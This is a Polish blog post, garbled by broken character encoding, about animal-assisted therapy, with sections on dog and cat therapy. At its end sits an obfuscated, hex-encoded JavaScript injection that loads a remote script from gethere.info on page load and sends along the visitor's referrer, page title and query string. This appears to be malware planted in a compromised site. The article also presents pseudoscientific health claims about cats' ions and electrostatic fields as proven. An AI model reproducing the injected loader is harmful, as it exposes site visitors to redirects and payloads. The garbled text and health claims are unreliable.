Zwierzak dobry na wszystko?

opublikowane w Najnowsze Wpisy, Psychologia | 0

a�zZwierzA�ta sA� jak lekarstwa, ktA?re nie posiadajA� skutkA?w ubocznycha�?

Nie interesuje ich nasz wyglA�d, status, czy poglA�dy. Nie oceniajA�, nie wymagajA�, nie majA� pretensji. PrzyjmujA� nas takimi, jakimi jesteA�my. SA� wiernymi przyjaciA?A�mi na dobre i zA�e, choA� czA�sto na tA� przyjaA?A� nie zasA�ugujemy. DajA� nam to, czego nigdy nie dostaniemy od innych ludzi – bezwarunkowA� wiA�A?. Jak siA� okazuje, sA� takA?e cudownymi terapeutami.

Animaloterapia lub zooterapia jest dziaA�aniem terapeutycznym wykorzystujA�cym dobroczynny wpA�yw na zdrowie i psychikA� czA�owieka poprzez kontakt ze zwierzA�ciem. Dla kaA?dej osoby, a w szczegA?lnoA�ci osoby chorej taki kontakt ze zwierzA�ciem jest niezwykle waA?ny. ZwierzA�ca naturalnoA�A� pomaga pacjentom zachowywaA� siA� podobnie – w sposA?b naturalny i spontaniczny, a dziA�ki bezkrytycznej akceptacji, jakA� zwierzA�ta majA� dla nas, pomagajA� osobom chorym w zaakceptowaniu siebie samych.

konie1

28-29TrochA� historiia��

Terapia z wykorzystaniem zwierzA�t ma swA?j poczA�tek w 1792 roku. ZwierzA�ta zostaA�y wprowadzone jako alternatywa dla konwencjonalnych terapii dla osA?b z problemami psychicznymi. Pacjenci mieli za zadanie uczyA� siA� samokontroli poprzez opiekA� nad zwierzA�tami. Elementem terapeutycznym byA�o takA?e powierzenie im peA�nej odpowiedzialnoA�ci za wychowanie pupili. Ta innowacyjna metoda odniosA�a spektakularne skutki poniewaA? zostaA�a wprowadzona do wielu szpitali. W 1903 roku W. Fowler Bucke po analizie dzieciA�cych wypracowaA� na temat psa, wysunA�A� wniosek o uzdrawiajA�cej roli zwierzA�cia, ktA?ra A�agodzi dzieciA�cA� samotnoA�A�.A�Za ojca animaloterapii uwaA?a siA� Borisa M. Levinsona, ktA?ry specjalizowaA� siA� w terapii psychoanalitycznej dzieci. Do pracy przychodziA� ze swoim psem, ktA?ry opuszczaA� gabinet na czas wizyt dzieci. KtA?regoA� dnia nie zdA�A?yA� opuA�ciA� gabinetu, gdyA? oczekiwany pacjent zjawiA� siA� wczeA�niej. Ku ogromnemu zaskoczeniu Levinsona chA�opiec, ktA?ry przez kilka miesiA�cy nie odzywaA� siA� podczas terapii, zaczA�A� rozmawiaA� z jego psem. To pojedyncze zdarzenie skA�oniA�o Levinsona do zapoznania siA� z tematem i podjA�cia badaA� w tej dziedzinie.

DziA� terapia ze zwierzA�tami jest coraz bardziej doceniana przez lekarzy, psychologA?w, a takA?e tych, ktA?rzy na co dzieA� pomagajA� osobom niepeA�nosprawnym. Z badaA� nad oddziaA�ywaniem zwierzA�t na czA�owieka wynika, A?e zwierzA� przekazuje wiele korzyA�ci emocjonalnych, poznawczych, spoA�ecznych i zdrowotnych. Ogromne znaczenie w terapii odgrywa dotyk. CzA�sto prA?g odczuwania u osA?b chorych jest zaburzony. Jedni wymagajA� wiA�cej stymulacji, inni sA� bardziej wraA?liwi na bodA?ce. ZwierzA�ta jako istoty A?ywe sA�A� delikatne, ciepA�e. MoA?na jA� dotykaA�, gA�askaA�, przytulaA�, braA� na rA�ce czy na kolana, a nawet caA�owaA�. Taki kontakt ze zwierzA�ciem stymuluje wydzielanie endorfin, czyli naturalnych substancji przeciwbA?lowych. Pobudza takA?e funkcje odpornoA�ciowe naszego organizmu i obniA?a poziom hormonA?w stresu – kortyzolu i noradrenaliny. Zbadano, A?e obecnoA�A� zwierzA�t w naszym otoczeniu powoduje odprA�A?enie, poprawA� nastroju, obniA?a ciA�nienia krwi i zwalnia akcjA� serca czA�owieka.

W ostatnich czasach w Polsce wzrosA�o zainteresowanie wpA�ywem zwierzA�t na proces zdrowienia osA?b dotkniA�tych rA?A?nymi zaburzeniami. Przede wszystkim kA�adzie siA� nacisk na rehabilitacjA� dzieci, poniewaA? to wA�aA�nie one najszybciej uczA� siA� nowych umiejA�tnoA�ci i szybciej przyzwyczajajA� siA� do zmian w swoim otoczeniu. DziA�ki kontaktowi ze zwierzA�tami dzieci rozwijajA� siA� fizycznie, usprawnia siA� ich koordynacja ruchowa i wytrzymaA�oA�A�. ZwierzA�ta, dziA�ki swej bezwarunkowej akceptacji, pomagajA� dzieciom nabraA� zaufania do A�wiata zewnA�trznego i otworzyA� siA� na ludzi, pozbawiajA� ich zahamowaA�. DziA�ki nim zmniejsza siA� strach dzieci przez zmianami i nowoA�ciami. Poprawa funkcjonowania dziecka w kontakcie ze zwierzA�ciem dzieje siA� czA�sto zupeA�nie spontanicznie i nieA�wiadomie. Usprawnia siA� komunikacja i umiejA�tnoA�ci spoA�eczne, pojawia siA� empatia i motywacja do dziaA�ania. ZwierzA� wpA�ywa takA?e na funkcjonowanie dziecka w sferze integracji sensorycznej. Poprawia siA� czucie gA�A�bokie i kontakt wzrokowy, ustA�pujA� nadwraA?liwoA�ci.A�Sama zooterapia zawiera w sobie elementy takie jak bezpoA�redni kontakt ze zwierzakiem – przytulanie, gA�askanie, zabawa, karmienie, czy pielA�gnacja. Jednak A�juA? samo obserwowanie zwierzA�cia moA?e mieA� dziaA�anie terapeutyczne.

Okazuje siA�, A?e nie tylko niepeA�nosprawni mogA� czerpaA� korzyA�ci z kontaktu ze zwierzA�cymi terapeutami. WpA�yw zwierzA�t oddziaA�uje teA? zbawiennie na osoby z depresjA�. Pacjentom, ktA?rzy cierpiA� na wysokie ciA�nienie krwi, pomaga obecnoA�A� zwierzaka w ich domu, a zwA�aszcza kontakt fizyczny, taki jak gA�askanie, czy przytulanie pupila. GA�askanie kota moA?e byA� doskonaA�ym A�wiczeniem ruchowym dla osA?b cierpiA�cych z powodu zmian reumatycznych w dA�oniach. Pomaga takA?e przy leczeniu niedowA�adA?w, jest wykorzystywane podczas rehabilitacji po zabiegach operacyjnych. Dowiedziono, A?e ludzie, ktA?rzy przeA?yli wielki stres, wypadek lub stratA� bliskiej osoby, sA� w stanie na chwilA� zapomnieA� o traumatycznych doA�wiadczeniach, gdy bawiA� siA� z psem, gA�aszczA� kota lub szczotkujA� konia. ZaskakujA�cy moA?e byA� fakt iA? niedawno zaczA�to stosowaA� animaloterapiA� w amerykaA�skim wiA�ziennictwie. WiA�A?niowie majA� moA?liwoA�A� oswajania dzikich koni, dziA�ki czemu podobno sami stajA� siA� bardziej A�agodni i radoA�ni.

Rodzaj zwierzA�cia jest dobierany w zaleA?noA�ci od potrzeb czA�owieka i rodzaju schorzenia. W Polsce najczA�A�ciej spotykanym rodzajem animaloterapii jest dogoterapia, czyli terapia z psami. OprA?cz niej zainteresowaniem cieszy siA� takA?e hipoterapia (terapia z koA�mi) oraz najmA�odsza, bo zapoczA�tkowana w 2004 roku felinoterapia, czyli terapia z kotami. Na A�wiecie znane sA� takA?e delfinoterapia (terapia z delfinami) oraz onoterapia (terapia z osA�ami i muA�ami), ktA?re nie sA� dostA�pne w Polsce. Rodzaj zwierzA�cia nie ma jednak takiego znaczenia, jak sama radoA�A� pacjentA?w z moA?liwoA�ci kontaktu z czworonogiem.

Dogoterapia

Dogoterapia jest formA� pomocy przy A�wiczeniach rehabilitacyjnych dziA�ki odpowiednio wybranym i przygotowanym psom. Dzieci nie lubiA� wykonywaA� A?mudnych A�wiczeA� czy gestA?w, za ktA?rymi nic siA� nie kryje. Pies daje moA?liwoA�A� wykonania ich w naturalny sposA?b i jednoczeA�nie okazania uczuA�. W czasie zajA�A� wykonuje siA� A�wiczenia i zabawy, ktA?re majA� sA�uA?yA� wszechstronnemu rozwojowi podopiecznego. Dogoterapia oddziaA�uje na sferA� emocjonalnA� przez przeA�amanie bariery niepewnoA�ci przed kontaktem z psem, akceptowanie obecnoA�ci psa w bliskim otoczeniu, eliminowanie agresji i autoagresjiA� u dziecka, ksztaA�towanie pozytywnych emocji A�oraz rozwA?j empatii. Terapia z psem rozwija takA?e sferA� umysA�owA� dziecka, wpA�ywa na koncentracjA�, uwagA�, rozwA?j mowy i funkcji poznawczych, pobudzanie zmysA�u wzroku, sA�uchu, dotyku i wA�chu. DziA�ki nawiA�zaniu wiA�zi z psem osoba niepeA�nosprawna czuje siA� pewniej we wA�asnym A�rodowisku, A�atwiej nawiA�zuje kontakty spoA�eczne, poprawia komunikacjA�, zdobywa nowych przyjaciA?A�. WiA�A? ta staje siA� motywatorem dziaA�aA�, daje poczucie bezwarunkowej akceptacji i sympatii. Ten rodzaj terapii swoje szybkie rezultaty zawdziA�cza cechom psa, ktA?re sA� widoczne dla kaA?dego z nas.

dogoterapia_7-400x267

69225

ObecnoA�A� psa na zajA�ciach, staje siA� motywacjA� do podejmowania dziaA�aA�, przynosi ukojenie i radoA�A�, odrywa od codziennej rzeczywistoA�ci. Dotyk, kontakt emocjonalny, poczucie wspA?A�istnienia ze stworzeniem, ktA?re posiada uczucia wyA?sze, a przy tym nie spostrzega negatywnych aspektA?w naszej osoby, to otwarte wrota moA?liwoA�ci do wszelkich podnoszA�cych jakoA�A� A?ycia dziaA�aA�.

Felinoterapia czyli kocia pomoc

GA�A?wnym zadaniem felinoterapii jest wprawienie pacjenta w dobry nastrA?j. Terapeutyczna rola kota polega na tym, A?e wokA?A� wA�asnego ciaA�a kot wytwarza neutralnA� elektrostatycznie dodatniA� strefA�. Powoduje to u ludzi chorych uczucie ulgi, odprA�A?enia, lepsze samopoczucie oraz polepszenie przebiegu choroby. ObecnoA�A� kota obniA?a poziom cholesterolu, ciA�nienie krwi, normuje rytm pracy serca, pomaga uporaA� siA� z bezsennoA�ciA�, jest korzystne w przypadkuA� grypy czy wrzodA?w A?oA�A�dka. CzA�sto mA?wi siA� o tym, A?e koty leczA�. PotrafiA� one bowiem znaleA?A� A?rA?dA�o bA?lu w organizmie czA�owieka, a ukA�adajA�c siA� przy chorym miejscu sA� rodzajem ciepA�ego okA�adu, ktA?ry a�zwyciA�ga bA?la�?. Ma to zwiA�zek z jonami ujemnymi, ktA?re znajdujA� siA� w kociej sierA�ci (bolesne miejsca sA� najonizowane dodatnio, po zetkniA�ciu z jonami ujemnymi dochodzi wiA�c do ich zneutralizowania).A�Udowodniono, A?eA� posiadanie kota A�zmniejszaA� o 20 proc. ryzyko wystA�pienia udaru albo zawaA�u. Okazuje siA�, A?e przed schorzeniami serca koty chroniA� nas skuteczniej od psA?w. Badania pokazujA�, A?e posiadanie kota wzmacnia zdrowie i zwiA�ksza odpornoA�A�. Na przykA�ad kocie mruczenie korzystnie wpA�ywa na nasz ukA�ad immunologiczny. OprA?cz tego pozwala siA� zrelaksowaA� i odprA�A?yA�. DziA�ki temu spada iloA�A� hormonA?w stresu w naszym organizmie, a zwiA�ksza siA� produkcja serotoniny, czyli tzw. hormonu szczA�A�cia. Posiadanie kota pomaga pozbyA� siA� depresji i szybciej dojA�A� do siebie po przykrych doA�wiadczeniach. Z pomocy kotA?w mogA� korzystaA� osoby niepeA�nosprawne umysA�owo bA�dA? umysA�owo i ruchowo. Felinoterapia jest stosowana przy leczeniu dzieci cierpiA�cych na zaburzenia emocji, nadpobudliwoA�A�, stany lA�kowe, wycofanie spoA�eczne, zespA?A� Downa, autyzm, AHDH i inne dolegliwoA�ci.A�Koty wykorzystywane do felinoterapii nie wymagajA� tresury. SA� to zwierzA�ta dziaA�ajA�ce instynktownie, ktA?rych naturalne zachowanie ma kojA�cy wpA�yw na otaczajA�cych ludzi.

Koci terapeuci pomagajA� takA?e osobom starszym czy samotnym. Naukowcy od dawna zwracajA� uwagA�, A?e w domach spokojnej staroA�ci, w ktA?rych mieszkajA� koty, pacjenci A?yjA� dA�uA?ej i sA�A�w lepszej kondycji. SA�yszaA�am o przypadku w Stanach Zjednoczonych, gdzie kot Oskar, przebywajA�cy w OA�rodku Rehabilitacyjnym dla SeniorA?w w Providence, przenosiA� siA� pomiA�dzy pokojami pacjentA?w i wprowadzaA� siA� do tych, ktA?rym w najbliA?szym czasie miaA�o groziA� pogorszenie stanu zdrowia. DziA�ki temu lekarze, obserwujA�c zachowanie kota, mogli skuteczniej pomagaA� swoim podopiecznym.

kot biaA�y

A czy Wy widzicie dobroczynny wpA�yw zwierzA�t na ludzi? ZachA�cam do dzielenia siA� spostrzeA?eniami!


 var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}